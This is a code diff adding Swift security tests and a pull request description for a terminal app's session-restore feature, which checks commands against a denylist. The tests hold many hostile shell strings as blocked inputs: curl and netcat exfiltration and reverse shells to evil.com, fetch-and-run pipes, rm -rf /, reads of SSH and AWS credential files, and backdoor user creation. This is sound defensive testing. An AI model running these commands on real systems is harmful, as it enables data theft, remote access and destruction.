+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("opencode\n--malicious", rawAllowlist: allowlist),
+                       "Command with embedded newline should be blocked")
+
+        // Carriage returns should also be blocked
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("ssh host\rrm -rf ~", rawAllowlist: allowlist),
+                       "Command with embedded carriage return should be blocked")
+    }
+
+    func testValidatedRestoreCommandRejectsNewlines() {
+        // validatedRestoreCommand should reject commands with newlines
+        XCTAssertNil(SessionRestoreCommandSettings.validatedRestoreCommand("opencode\n--flag"),
+                     "validatedRestoreCommand should reject newlines")
+        XCTAssertNil(SessionRestoreCommandSettings.validatedRestoreCommand("opencode\r--flag"),
+                     "validatedRestoreCommand should reject carriage returns")
+        XCTAssertNil(SessionRestoreCommandSettings.validatedRestoreCommand("ssh host\nrm -rf /"),
+                     "validatedRestoreCommand should reject multi-line injection")
+    }
+
+    // MARK: - Allowlist Matching with Special Characters
+
+    func testAllowlistMatchesCommandsWithSpecialCharactersInArgs() {
+        // Verify that allowlist pattern matching works correctly when commands
+        // contain shell metacharacters, quotes, or spaces in their arguments.
+        // Note: This tests allowlist matching, NOT shellQuoteIfNeeded() which is
+        // used internally by SessionForegroundProcessDetector.commandLineString().
+        let allowlist = "myapp *"
+
+        // Commands with spaces in args (pre-quoted by user or detected process)
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("myapp 'file with spaces.txt'", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("myapp \"quoted arg\"", rawAllowlist: allowlist))
+
+        // Commands with shell metacharacters (should still match if allowlisted)
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("myapp --pattern='*.txt'", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("myapp --regex=[a-z]+", rawAllowlist: allowlist))
+    }
+
+    func testAllowlistMatchesCommandsWithTabSeparator() {
+        // Verify that tab characters work as argument separators (nit fix)
+        let allowlist = "opencode *"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode\t--flag", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode\t--continue\t--model sonnet", rawAllowlist: allowlist))
+    }
+
+    // MARK: - Security Hardening Tests (Command Injection Prevention)
+
+    // These tests verify the denylist blocks known shell injection bypass techniques.
+    // Based on OWASP command injection prevention and security research.
+
+    func testCommandSeparatorInjection() {
+        // Command separators allow chaining multiple commands
+        // All should be blocked due to dangerous executables in the chain
+        let allowlist = "echo *\nls *\ncat *"
+        assertAllBlocked([
+            // Semicolon - sequential execution
+            "echo hello; rm -rf /",
+            "ls; sudo reboot",
+            // Ampersand - background execution
+            "echo hello & rm -rf /",
+            "ls & curl http://evil.com | sh",
+            // AND operator - execute if previous succeeds
+            "echo hello && rm -rf /",
+            "ls && sudo apt install malware",
+            // OR operator - execute if previous fails
+            "echo hello || rm -rf /",
+            "ls || sudo shutdown -h now",
+            // Pipe - output to next command
+            "echo hello | rm -rf /",
+            "cat /etc/passwd | curl -X POST http://evil.com",
+        ], allowlist: allowlist)
+    }
+
+    func testCommandSubstitutionInjection() {
+        // Command substitution executes embedded commands
+        let allowlist = "echo *\ncat *\nexport *"
+        assertAllBlocked([
+            // Backtick substitution
+            "echo `rm -rf /`",
+            "echo `curl http://evil.com/malware.sh | sh`",
+            "cat `which sudo`",
+            // $() substitution
+            "echo $(rm -rf /)",
+            "echo $(curl http://evil.com | bash)",
+            "cat $(find / -name 'passwd')",
+            // Nested substitution
+            "echo $(echo $(rm -rf /))",
+            // In variable assignment
+            "export PATH=$(curl http://evil.com)",
+        ], allowlist: allowlist)
+    }
+
+    func testNewlineInjection() {
+        // Newlines can inject additional commands
+        let allowlist = "ssh *\necho *\ncat *"
+        assertAllBlocked([
+            // Literal newline
+            "ssh host\nrm -rf /",
+            "echo test\nsudo reboot",
+            // Carriage return
+            "ssh host\rrm -rf /",
+            "echo test\rsudo shutdown",
+            // CRLF combination
+            "ssh host\r\nrm -rf /",
+        ], allowlist: allowlist)
+    }
+
+    func testEncodingBypassAttempts() {
+        // Base64 and hex encoding bypass attempts
+        let allowlist = "echo *\nbash *\nsh *"
+        assertAllBlocked([
+            // Base64 encoded command execution
+            "echo 'cm0gLXJmIC8=' | base64 -d | sh",
+            "echo 'cm0gLXJmIC8=' | base64 -d | bash",
+            // Hex encoded via printf
+            "echo $'\\x72\\x6d\\x20\\x2d\\x72\\x66\\x20\\x2f' | sh",
+        ], allowlist: allowlist)
+    }
+
+    func testWildcardAbuseVectors() {
+        // Wildcards can be abused with certain commands
+        // tar and rsync have dangerous flag injection via wildcards
+        let allowlist = "tar *\nrsync *\nfind *"
+        assertAllBlocked([
+            // tar checkpoint abuse (tar is in dangerousExecutables)
+            "tar -cf archive.tar --checkpoint=1 --checkpoint-action=exec=sh",
+            "tar -xf archive.tar --checkpoint-action=exec='rm -rf /'",
+            // rsync -e abuse (rsync is in dangerousExecutables)
+            "rsync -e 'sh -c \"rm -rf /\"' src dst",
+            // find -exec abuse
+            "find / -name '*' -exec rm -rf {} \\;",
+            "find . -exec /bin/sh -c 'curl evil.com | sh' \\;",
+        ], allowlist: allowlist)
+    }
+
+    func testShellExpansionBypasses() {
+        // Shell expansion techniques that might bypass naive filtering
+        let allowlist = "echo *\ncat *"
+        assertAllBlocked([
+            // Brace expansion to form commands
+            "echo {rm,-rf,/}",
+            // Variable-based command construction (if eval'd)
+            "echo $HOME; rm -rf /",
+            // History expansion (if enabled)
+            "echo test; !!",  // !! repeats last command
+        ], allowlist: allowlist)
+    }
+
+    func testPathTraversalInCommands() {
+        // Path traversal attempts to access sensitive files
+        let allowlist = "cat *\nless *\nhead *"
+        assertAllBlocked([
+            // Direct path traversal to sensitive files
+            "cat ../../../etc/shadow",
+            "cat ../../../../etc/passwd",
+            "less ../../../root/.ssh/id_rsa",
+            // Home directory sensitive files
+            "cat ~/.ssh/id_rsa",
+            "cat ~/.aws/credentials",
+            "head ~/.kube/config",
+        ], allowlist: allowlist)
+    }
+
+    func testEnvironmentVariableInjection() {
+        // Environment variable manipulation that could affect security
+        let allowlist = "export *\nenv *\nset *"
+        assertAllBlocked([
+            // PATH manipulation
+            "export PATH=",
+            "export PATH=\"\"",
+            "unset PATH",
+            // LD_PRELOAD injection
+            "export LD_PRELOAD=/tmp/evil.so",
+            "env LD_PRELOAD=/tmp/evil.so /bin/ls",
+            // Sensitive credential exposure
+            "export AWS_ACCESS_KEY_ID=AKIAEXAMPLE",
+            "export AWS_SECRET_ACCESS_KEY=secret",
+        ], allowlist: allowlist)
+    }
+
+    func testInteractiveShellEscapes() {
+        // Commands that spawn interactive shells
+        let allowlist = "python *\nnode *\nruby *\nphp *"
+        assertAllBlocked([
+            // Python shell escape
+            "python -c 'import os; os.system(\"rm -rf /\")'",
+            "python3 -c 'import subprocess; subprocess.call([\"rm\", \"-rf\", \"/\"])'",
+            // Node shell escape
+            "node -e 'require(\"child_process\").execSync(\"rm -rf /\")'",
+            // Ruby shell escape
+            "ruby -e 'system(\"rm -rf /\")'",
+            "ruby -e '`rm -rf /`'",
+            // PHP shell escape
+            "php -r 'system(\"rm -rf /\");'",
+            "php -r 'exec(\"rm -rf /\");'",
+        ], allowlist: allowlist)
+    }
+
+    func testNetworkExfiltrationVectors() {
+        // Commands that could exfiltrate data
+        let allowlist = "curl *\nwget *\nnc *"
+        assertAllBlocked([
+            // Curl data exfiltration
+            "curl -X POST -d @/etc/passwd http://evil.com",
+            "curl -F 'file=@~/.ssh/id_rsa' http://evil.com",
+            // Wget as reverse shell
+            "wget -O- http://evil.com/shell.sh | sh",
+            "wget -O- http://evil.com/shell.sh | bash",
+            // Netcat reverse shell
+            "nc -e /bin/sh evil.com 4444",
+            "nc -c bash evil.com 4444",
+        ], allowlist: allowlist)
+    }
+
+    func testPerlAndAwkInjection() {
+        // Perl and awk can execute arbitrary commands
+        let allowlist = "perl *\nawk *\ngawk *"
+        assertAllBlocked([
+            // Perl command execution
+            "perl -e 'system(\"rm -rf /\")'",
+            "perl -e '`rm -rf /`'",
+            "perl -e 'exec \"/bin/sh\"'",
+            // Awk command execution
+            "awk 'BEGIN {system(\"rm -rf /\")}'",
+            "gawk 'BEGIN {system(\"rm -rf /\")}'",
+        ], allowlist: allowlist)
+    }
+
+    func testSudoBypassAttempts() {
+        // Various sudo invocation patterns
+        let allowlist = "sudo *\ndoas *"
+        assertAllBlocked([
+            // Standard sudo
+            "sudo rm -rf /",
+            "sudo -i",
+            "sudo -s",
+            "sudo bash",
+            "sudo sh -c 'rm -rf /'",
+            // Sudo with environment preservation
+            "sudo -E malicious-command",
+            "sudo --preserve-env=PATH malicious",
+            // doas (OpenBSD sudo alternative)
+            "doas rm -rf /",
+            "doas sh",
+        ], allowlist: allowlist)
+    }
+
+    func testHeredocInjection() {
+        // Heredoc can be used to inject multi-line commands
+        let allowlist = "cat *\nbash *\nsh *"
+        assertAllBlocked([
+            // Heredoc to shell
+            "cat << EOF | sh\nrm -rf /\nEOF",
+            "bash << 'END'\nrm -rf /\nEND",
+            // Heredoc with dangerous commands
+            "sh <<< 'rm -rf /'",
+        ], allowlist: allowlist)
+    }
+
+    func testXargsInjection() {
+        // xargs can execute commands with piped input
+        let allowlist = "echo *\nfind *\nls *"
+        assertAllBlocked([
+            // xargs command execution
+            "echo 'file' | xargs rm",
+            "find . -name '*.txt' | xargs rm -rf",
+            "ls | xargs -I {} rm {}",
+            // xargs with shell
+            "echo 'cmd' | xargs -I {} sh -c {}",
+        ], allowlist: allowlist)
+    }
+
+    func testProcessSubstitution() {
+        // Process substitution can execute commands
+        let allowlist = "diff *\ncat *\ncomm *"
+        assertAllBlocked([
+            // Process substitution with dangerous commands
+            "diff <(cat /etc/passwd) <(curl http://evil.com)",
+            "cat <(rm -rf /tmp/*)",
+            // Input redirection abuse
+            "cat < <(curl http://evil.com/malware.sh)",
+        ], allowlist: allowlist)
+    }
+
+    func testGlobPatternAbuse() {
+        // Glob patterns that might cause unintended file operations
+        let allowlist = "rm *\nchmod *\nchown *"
+        assertAllBlocked([
+            // rm is dangerous
+            "rm -rf *",
+            "rm -rf /*",
+            "rm -rf /tmp/*",
+            // chmod/chown on sensitive paths
+            "chmod 777 /",
+            "chmod -R 777 /*",
+            "chown root:root /",
+        ], allowlist: allowlist)
+    }
+
+    func testDockerEscapeVectors() {
+        // Docker commands that could escape container or cause damage
+        let allowlist = "docker *"
+        assertAllBlocked([
+            // Privileged container escape
+            "docker run --privileged -v /:/mnt alpine",
+            "docker run --pid=host --privileged alpine",
+            // Socket mount (escape vector)
+            "docker run -v /var/run/docker.sock:/var/run/docker.sock alpine",
+            // Mass destruction
+            "docker system prune -af",
+            "docker rm -f $(docker ps -aq)",
+            "docker volume prune -f",
+        ], allowlist: allowlist)
+    }
+
+    func testGitCredentialExposure() {
+        // Git commands that might expose credentials
+        let allowlist = "git *"
+        assertAllBlocked([
+            // Credential helpers that might log
+            "git config --global credential.helper store",
+            // Force push to protected branches
+            "git push --force origin main",
+            "git push -f origin master",
+            // Hard reset (data loss)
+            "git reset --hard HEAD~10",
+            "git clean -fd",
+            // Checkout force (data loss)
+            "git checkout --force .",
+        ], allowlist: allowlist)
+    }
+
+    func testSSHDangerousOptions() {
+        // SSH with dangerous options
+        let allowlist = "ssh *\nscp *"
+        assertAllBlocked([
+            // SSH with command execution
+            "ssh user@host 'rm -rf /'",
+            "ssh -t user@host 'sudo reboot'",
+            // SCP to/from sensitive files
+            "scp user@host:/etc/shadow .",
+            "scp ~/.ssh/id_rsa user@host:",
+            // SSH agent forwarding can be dangerous
+            "ssh -A user@host",
+        ], allowlist: allowlist)
+    }
+
+    func testCronAndAtScheduling() {
+        // Scheduled task manipulation
+        let allowlist = "crontab *\nat *"
+        assertAllBlocked([
+            // Crontab manipulation
+            "crontab -r",  // Remove all cron jobs
+            "crontab -l | { cat; echo '* * * * * rm -rf /'; } | crontab -",
+            // at scheduling
+            "at now <<< 'rm -rf /'",
+            "echo 'rm -rf /' | at now",
+        ], allowlist: allowlist)
+    }
+
+    func testDiskAndPartitionManipulation() {
+        // Disk and partition manipulation commands
+        let allowlist = "fdisk *\nparted *\nmkfs *"
+        assertAllBlocked([
+            // Partition deletion
+            "fdisk /dev/sda",
+            "parted /dev/sda rm 1",
+            // Filesystem creation (destroys data)
+            "mkfs.ext4 /dev/sda1",
+            "mkfs -t ext4 /dev/sda",
+            // dd to disk (already covered but explicit)
+            "dd if=/dev/zero of=/dev/sda bs=1M",
+        ], allowlist: allowlist)
+    }
+
+    func testKernelModuleManipulation() {
+        // Kernel module loading/unloading
+        let allowlist = "modprobe *\ninsmod *\nrmmod *"
+        assertAllBlocked([
+            // Module loading
+            "modprobe malicious_module",
+            "insmod /tmp/rootkit.ko",
+            // Module removal
+            "rmmod important_driver",
+            "modprobe -r critical_module",
+        ], allowlist: allowlist)
+    }
+
+    func testUserAndGroupManipulation() {
+        // User and group manipulation
+        let allowlist = "useradd *\nusermod *\nuserdel *\npasswd *"
+        assertAllBlocked([
+            // User creation with elevated privileges
+            "useradd -o -u 0 backdoor",
+            "usermod -aG sudo attacker",
+            "usermod -aG wheel attacker",
+            // User deletion
+            "userdel -r victim",
+            // Password manipulation
+            "passwd root",
+            "echo 'root:newpass' | chpasswd",
+        ], allowlist: allowlist)
+    }
+
+    // MARK: - Shell-Specific Syntax Tests
+
+    func testFishShellSyntax() {
+        // Fish shell uses different syntax
+        let allowlist = "echo *\nset *"
+        assertAllBlocked([
+            // Fish command substitution uses ()
+            "echo (rm -rf /)",
+            // Fish variable with command
+            "set result (curl http://evil.com | sh)",
+        ], allowlist: allowlist)
+    }
+
+    func testZshSpecificSyntax() {
+        // Zsh-specific dangerous patterns
+        let allowlist = "echo *\nprint *"
+        assertAllBlocked([
+            // Zsh glob qualifiers with command execution
+            "echo **/*(e:'rm -rf $REPLY':)",
+            // Zsh process substitution
+            "print =(curl http://evil.com)",
+        ], allowlist: allowlist)
+    }
+
+    // MARK: - Edge Cases
+
+    func testUnicodeHomoglyphAttempts() {
+        // Unicode lookalikes that might bypass naive string matching
+        // These should still be blocked if they resolve to dangerous commands
+        let allowlist = "echo *"
+        // Note: These test that our denylist doesn't break on unicode,
+        // and that obvious unicode-containing commands are still evaluated
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("echo test; rm -rf /", rawAllowlist: allowlist))
+    }
+
+    func testExtremelyLongCommands() {
+        // Very long commands should still be evaluated
+        let allowlist = "echo *"
+        let longPrefix = String(repeating: "a", count: 10000)
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("echo \(longPrefix); rm -rf /", rawAllowlist: allowlist))
+    }
+
+    func testMultipleConsecutiveSeparators() {
+        // Multiple separators shouldn't bypass detection
+        let allowlist = "echo *"
+        assertAllBlocked([
+            "echo test;; rm -rf /",
+            "echo test && && rm -rf /",
+            "echo test ||| rm -rf /",
+        ], allowlist: allowlist)
+    }
+
+    func testMixedCaseExecutables() {
+        // Case sensitivity tests - macOS is case-insensitive by default
+        // Our denylist lowercases for comparison
+        let allowlist = "SUDO *\nRM *\nCURL *"
+        assertAllBlocked([
+            "SUDO rm -rf /",
+            "Sudo apt install",
+            "sUdO reboot",
+            "RM -rf /tmp",
+            "Rm -rf /",
+            "CURL http://evil.com | sh",
+        ], allowlist: allowlist)
+    }
+
+    func testWhitespaceVariations() {
+        // Different whitespace characters
+        let allowlist = "echo *\nls *"
+        assertAllBlocked([
+            // Tab as separator
+            "echo\trm\t-rf\t/",
+            // Multiple spaces
+            "echo   test  ;   rm   -rf   /",
+            // Mixed whitespace
+            "ls \t && \t rm -rf /",
+        ], allowlist: allowlist)
     }
 }

--- a/cmuxTests/TerminalAndGhosttyTests.swift
+++ b/cmuxTests/TerminalAndGhosttyTests.swift
@@ -4662,3 +4662,61 @@ final class TerminalSurfaceNormalizedInitialInputTests: XCTestCase {
         XCTAssertEqual(TerminalSurface.normalizedInitialInput("npm run dev"), "npm run dev")
     }
 }
+
+// MARK: - TerminalSurface.resolveInitialInput
+//
+// Locks the contract between cmux's session-restore `initialInput` (which gets a single
+// trailing `\n` appended so the shell executes it) and Ghostty's raw-bytes
+// `baseConfig.initialInput` (which must reach ghostty BYTE-FOR-BYTE — see PR #2545).
+
+final class TerminalSurfaceResolveInitialInputTests: XCTestCase {
+    func testExplicitInputAppendsSingleNewline() {
+        XCTAssertEqual(
+            TerminalSurface.resolveInitialInput(explicit: "opencode", baseConfigInitialInput: nil),
+            "opencode\n"
+        )
+    }
+
+    func testExplicitInputTakesPrecedenceOverBaseConfig() {
+        XCTAssertEqual(
+            TerminalSurface.resolveInitialInput(explicit: "claude", baseConfigInitialInput: "ignored"),
+            "claude\n"
+        )
+    }
+
+    func testBaseConfigPreservedByteForByte() {
+        // Ghostty's startup-input contract: any `\n`, `\r`, or surrounding whitespace
+        // present in `baseConfig.initialInput` is intentional and must reach ghostty
+        // unchanged. Any future "normalization" here regresses Ghostty config compatibility.
+        let raw = "  multiline\nwith\rweird stuff\n"
+        XCTAssertEqual(
+            TerminalSurface.resolveInitialInput(explicit: nil, baseConfigInitialInput: raw),
+            raw
+        )
+    }
+
+    func testBaseConfigSurroundingWhitespacePreserved() {
+        let raw = "  spaces both ends  "
+        XCTAssertEqual(
+            TerminalSurface.resolveInitialInput(explicit: nil, baseConfigInitialInput: raw),
+            raw
+        )
+    }
+
+    func testBothNilReturnsNil() {
+        XCTAssertNil(TerminalSurface.resolveInitialInput(explicit: nil, baseConfigInitialInput: nil))
+    }
+
+    func testEmptyExplicitFallsThroughToBaseConfig() {
+        XCTAssertEqual(
+            TerminalSurface.resolveInitialInput(explicit: "", baseConfigInitialInput: "fallback"),
+            "fallback"
+        )
+    }
+
+    func testEmptyBaseConfigReturnsNil() {
+        XCTAssertNil(
+            TerminalSurface.resolveInitialInput(explicit: nil, baseConfigInitialInput: "")
+        )
+    }
+}

--- a/cmuxTests/TerminalAndGhosttyTests.swift
+++ b/cmuxTests/TerminalAndGhosttyTests.swift
@@ -4588,3 +4588,77 @@ final class TerminalControllerSocketListenerHealthTests: XCTestCase {
         )
     }
 }
+
+// MARK: - TerminalSurface.normalizedInitialInput
+//
+// Guards the contract introduced when merging #2545 (auto-restore commands) with main
+// (restorable-agent resume). Both callers funnel into `TerminalSurface.init(initialInput:)`
+// but use different newline conventions; the normalizer unifies them without losing the
+// injection-prevention goal.
+
+final class TerminalSurfaceNormalizedInitialInputTests: XCTestCase {
+    func testBareCommandPassesThrough() {
+        XCTAssertEqual(TerminalSurface.normalizedInitialInput("opencode"), "opencode")
+    }
+
+    func testSingleTrailingNewlineIsStripped() {
+        // Matches `RestorableAgentSession.resumeStartupInput()` which always returns "<cmd>\n".
+        XCTAssertEqual(TerminalSurface.normalizedInitialInput("claude --resume abc\n"), "claude --resume abc")
+    }
+
+    func testEmbeddedNewlineIsRejected() {
+        // Defense-in-depth: block multi-line injection even though
+        // `SessionRestoreCommandSettings.validatedRestoreCommand` is the primary gate.
+        XCTAssertNil(TerminalSurface.normalizedInitialInput("ls\nrm -rf /"))
+        XCTAssertNil(TerminalSurface.normalizedInitialInput("ls\nrm -rf /\n"))
+    }
+
+    func testCarriageReturnIsRejected() {
+        XCTAssertNil(TerminalSurface.normalizedInitialInput("ls\r"))
+        XCTAssertNil(TerminalSurface.normalizedInitialInput("ls\r\n"))
+        XCTAssertNil(TerminalSurface.normalizedInitialInput("foo\rbar"))
+    }
+
+    func testEmptyInputsReturnNil() {
+        XCTAssertNil(TerminalSurface.normalizedInitialInput(nil))
+        XCTAssertNil(TerminalSurface.normalizedInitialInput(""))
+        XCTAssertNil(TerminalSurface.normalizedInitialInput("\n"))
+        XCTAssertNil(TerminalSurface.normalizedInitialInput("   "))
+        XCTAssertNil(TerminalSurface.normalizedInitialInput("   \n"))
+    }
+
+    func testSurroundingWhitespaceIsTrimmed() {
+        XCTAssertEqual(TerminalSurface.normalizedInitialInput("  opencode  "), "opencode")
+        XCTAssertEqual(TerminalSurface.normalizedInitialInput("  opencode  \n"), "opencode")
+    }
+
+    func testOnlyOneTrailingNewlineIsStripped() {
+        // Two trailing \n means at least one is internal -> reject.
+        XCTAssertNil(TerminalSurface.normalizedInitialInput("opencode\n\n"))
+    }
+
+    func testAgentResumeCommandShapeIsAccepted() {
+        // Shape produced by `RestorableAgentSession.resumeStartupInput()` for Claude/Codex resume.
+        let resumeLike = "cd '/home/user/proj' && claude --resume 'abc-123'\n"
+        XCTAssertEqual(
+            TerminalSurface.normalizedInitialInput(resumeLike),
+            "cd '/home/user/proj' && claude --resume 'abc-123'"
+        )
+    }
+
+    func testScriptLauncherShapeIsAccepted() {
+        // Shape produced by `resumeStartupInput()` fallback when the inline command exceeds
+        // `maxInlineStartupInputBytes`.
+        let scriptLike = "/bin/zsh '/tmp/cmux-agent-resume/launch-xyz.sh'\n"
+        XCTAssertEqual(
+            TerminalSurface.normalizedInitialInput(scriptLike),
+            "/bin/zsh '/tmp/cmux-agent-resume/launch-xyz.sh'"
+        )
+    }
+
+    func testBareSessionRestoreCommandShapeIsAccepted() {
+        // Shape produced by `SessionRestoreCommandSettings.validatedRestoreCommand()`:
+        // bare command, no trailing newline. `createSurface` appends the \n.
+        XCTAssertEqual(TerminalSurface.normalizedInitialInput("npm run dev"), "npm run dev")
+    }
+}


### PR DESCRIPTION
## Summary

Auto-restores allowlisted foreground commands when sessions are restored (Sparkle update, quit/relaunch, system restart). On quit, cmux snapshots each terminal's foreground process via `ps` + `KERN_PROCARGS2`; on restore, types it into the fresh shell through a new one-shot `initialInput` on `TerminalSurface` / `TerminalPanel` (distinct from `initialCommand`).

## Safety

Hardcoded denylist runs **before** the user's allowlist. Blocks destructive executables (`sudo`, `rm`, `dd`, `mkfs`, `curl`, …), credential flags, CRLF injection, absolute-path bypasses, SSH `LocalCommand` / `PermitLocalCommand` / `ProxyCommand`, and `ssh -A`. Even an allowlisted `ssh *` cannot smuggle local code via `-o LocalCommand=…`. Foreground cache refreshes async on autosave, sync (2s timeout) on quit.

## Notes

- Snapshot fields `detectedCommand` / `isRemoteBacked` are optional — old snapshots decode unchanged, no schema bump.
- Restore no longer rehydrates per-panel `surfaceTTYNames` / `surfaceListeningPorts`; new terminals report their own.
- Out of scope: Settings UI + translations (Part 2), live process state preservation (#1337), tmux auto-attach (reverted — silent false-positive when server died), remote terminals (detected + skipped).
- 100+ unit tests cover allowlist/denylist matching, CRLF (Unicode-scalar-safe), credential redaction, SSH options, denylist precedence, snapshot round-trip, and `initialInput` normalization. Manual: `opencode` auto-restarts after quit + relaunch.

## Related

Part 1 of 2 of #2544. Helps #1984 and #2823. Step toward #2086. Supersedes #1192. Replaces #2545 (clean rebase + SSH `LocalCommand`/`ProxyCommand` hardening).

<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Auto-restores safe terminal commands after app restart/update by detecting each terminal’s foreground process on quit and typing the command into the new shell on restore. Part 1 of 2 for #2544.

- New Features
  - Detects the foreground process per TTY on quit and validates via `SessionRestoreCommandSettings` (denylist first, then allowlist).
  - Persists `detectedCommand` per panel and restores it via one‑shot `initialInput`; agent resume input (when present) takes precedence.
  - Skips remote-backed terminals and records `isRemoteBacked` to avoid restoring remote commands.
  - Caches detected commands with `SessionForegroundProcessCache` (async autosave refresh; up to 2 s block on quit).
  - Hardened denylist blocks `sudo`, `rm`, `dd`, credential flags, CRLF injection, absolute paths, and SSH `LocalCommand`/`PermitLocalCommand`/`ProxyCommand`.
  - Stops rehydrating per-panel TTY/listening-port metadata; new terminals report their own to avoid stale lookups.
  - Snapshot remains backward compatible (new fields are optional). Tests cover validation, injection guards, agent precedence, newline normalization, and snapshot round-trips.

- Bug Fixes
  - Restoring a local panel inside a now-remote workspace no longer drops its `initialInput`; restore honors per-panel `isRemoteBacked` and preserves local input.
  - Added `allowInitialInputWithRemoteStartupCommand` to `newTerminalSurface(...)`, `private(set)` on `TerminalSurface.initialInput`, and `TerminalSurface.normalizedInitialInput(...)`. New tests lock the explicit-vs-Ghostty raw-bytes startup-input contract and the remote/local restore gates.

<sup>Written for commit cf45cf9e77ac9e8120cbf3636793f12d15ebb5be. Summary will update on new commits.</sup>

<!-- End of auto-generated description by cubic. -->

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Optional, safe auto-restore of detected foreground commands for local terminals (user-configurable allowlist/deny rules)

* **Improvements**
  * More reliable quit/save behavior with targeted foreground-process cache refresh (sync on quit, async otherwise)
  * Terminal input handling: one-shot explicit inputs normalized and cleared after use; raw restore bytes preserved
  * Remote-backed terminals now suppress command restore and related metadata

* **Documentation**
  * Clarified terminal initialization constraints for initial command/input

* **Tests**
  * Expanded tests for restoration security, input normalization, and remote-terminal snapshots

* **Bug Fixes**
  * Quit flow no longer marks termination state prematurely
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
